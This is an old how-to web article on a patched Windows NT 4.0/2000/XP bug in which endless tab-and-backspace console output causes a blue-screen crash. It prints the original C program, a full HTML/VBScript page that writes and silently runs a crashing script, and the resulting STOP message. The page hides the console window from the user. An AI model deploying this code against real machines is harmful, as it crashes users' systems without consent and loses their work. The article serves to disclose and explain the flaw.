HOW TO crash Windows NT 4.0\2000\XP using only VBScript

Update 16/2/2003. It has come to my attention that this bug has been fixed in Windows NT 4.0 SP6.0a, Windows 2000 SP3 and Windows XP SP1. This script will also only work as a local script, and not in the VB Script runtime internet zone sand-box.

Background

In the computing journal Windows::Developer in the March 2002 issue on page 44 a small C program was published that can cause Microsoft Windows NT 4.0 and 2000 to crash. The Windows term for this type of crash is a "blue-screen" because the Windows user interface disappears and a blue screen is displayed with diagnostic information in white text. When this happens, the operating system must be rebooted. This type of crash is normally caused by a device driver causing a STOP, but this program is extremely simple.

The original program

In the article it says that this program was originally posted by Masaru Tsuchiyama on the comp.os.ms-windows.programmer.win32 newsgroup.


#include <stdio.h>
void main()
{
	for(;;)
	{
		printf("Hung up\t\b\b\b\b\b\b");
	}
}

On analysis the program runs in an infinite loop continually printing the string "Hung up". The tab character moves the cursor 4 characters along in the DOS prompt, then the backspaces move the cursor 6 characters back. In practice, the leading part of the string can be any valid string.

After 2 iterations the cursor is behind the start position, in reality the pointer in the command prompt must be pointing at random memory. As the program loops again and again it gets further down in memory eventually causing a protection fault in a Windows subsystem.

I would expect this code to only cause a protection fault in the application and it shouldn't crash the operating system. Perhaps Microsoft can shed light on this problem? This program does not cause a similar problem on Windows 95\98 or ME.

The script risk

When we saw this, someone commented on the potential danger of this being executed in a script, particularly on a web page. We thought it was impossible, it's a pity that it wasn't.

VBScript in a web page

I believed that this program could be reproduced purely in script. An executable console application generated by a C Compiler is one thing, but a script is more dangerous because it could be used on a web page.

If you wish to test this script, download here.
Important! Close all of your applications and save your work before you test this.

For additional safety the script will only run when the button is pressed, but it could be called in the Window_onLoad handler, crashing the machine without warning.


<html>
<head>
</head>

<body>
<input type="BUTTON" name="Write" value="Click me" language=VBS onclick="WriteToFile">

<script language="vbs">
Sub WriteToFile
	Dim fso, f
	Set fso = CreateObject("Scripting.FileSystemObject")
	Set f = fso.OpenTextFile("c:\hangup.vbs", 2, True)
	f.Write "While 1"
	f.WriteBlankLines 1
	f.Write "  WScript.StdOut.Write ""a""+chr(9)+chr(8)+chr(8)+chr(8)+chr(8)+chr(8)+chr(8)"
	f.WriteBlankLines 1
	f.Write "Wend"
	f.Close

	Set f = fso.OpenTextFile("c:\hangup.bat", 2, True)
	f.Write "cscript c:\hangup.vbs"
	f.Close

	Dim w
	Set w = CreateObject("WScript.Shell")
	w.Run "c:\hangup.bat",2
End Sub
</script>

</body>
</html>

The page uses the VBScript to write VBScript in a file that will be executed by the CScript.exe scripting host runtime. CScript.exe is used, as opposed to WScript.exe, because it allows text output to the console.

Note that WScript.StdOut.Write is used. The problem does not occur when WScript.Write is used. Also note that the batch file is run minimized by passing 2 as the second parameter to the Run method. This hides the console from the user so they may not see what's happening until it's too late.

Analysis

This script was written by me to illustrate the problem using the Windows Scripting Host shell to execute the script and FileSystemObjects to write the dangerous script payload in the page.

This could be executed on a web page, it may even be possible to cause it to be executed on a web server although I cannot think of a way to do this yet. XML and SOAP servers that load script into a DOM Document may be susceptible to this. The potential for mischief is enormous!

The bottom line is, if it runs Windows NT 4.0\2000 or XP and it executes this script, it will crash.

The crash screen

Here is a transcript of the crash report on Windows NT 4.0 with Service Pack 6 installed.


STOP: c000021a (Fatal System Error)
The Windows SubSystem system process terminated unexpectedly
with a status of 0xc0000005 (0x77f7d670 0x00a3fa30).
The system has been shut down.

Restart and set the recovery options in the system control panel
or the /CRASHDEBUG system start option. If this message reappears,
contact your system administration or technical support group.

On Windows 2000 with Service Pack 2 installed it caused a blue screen too.
On Windows XP the operating system rebooted but did not blue screen.

Back to index.